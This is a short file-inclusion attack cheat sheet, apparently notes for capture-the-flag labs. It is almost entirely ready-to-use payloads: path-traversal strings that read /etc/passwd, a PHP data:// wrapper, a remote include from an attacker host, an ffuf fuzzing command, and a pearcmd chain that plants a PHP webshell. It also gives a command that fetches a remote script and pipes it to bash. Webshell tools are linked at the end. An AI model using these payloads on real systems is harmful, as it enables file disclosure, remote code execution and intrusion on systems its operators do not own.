#######
LFI/RFI
#######

| https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md

| Direct file path trasversal

.. code-block::

    ../../../../../../../../etc/passwd
    data://text/plain,<?php phpinfo(); ?>
    http://atacker.com/mal.php

|

.. code-block:: bash

    ffuf -u https://host.htb/?file=FUZZ -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -ic -c -ac -k -H 'Cookie: PHPSESSID=l5l8ad3k06f2h9493eqgtn9ppb'

|

| Dealing with '.php' added to the page name

.. code-block::

    ../../../../../../../../etc/passwd%00
    ../../../../../../../../usr/local/lib/php/pearcmd

|

| Example for pearcmd

.. code-block:: bash

    curl --path-as-is 'http://host/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=`$_GET\[0\]`?>+payload.php'
    curl --path-as-is 'http://host/payload.php?0=id'
    
    cat <<'EOF'| tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n'
    curl 10.10.14.113/r.sh|bash
    EOF

    # curl --path-as-is 'http://host/payload.php?0=curl+10.10.14.113%2Fr.sh%7Cbash'

|

*********
WebShells
*********

| https://gitlab.com/charles.gargasson/AsyncShellPHP
| https://github.com/epinna/weevely3


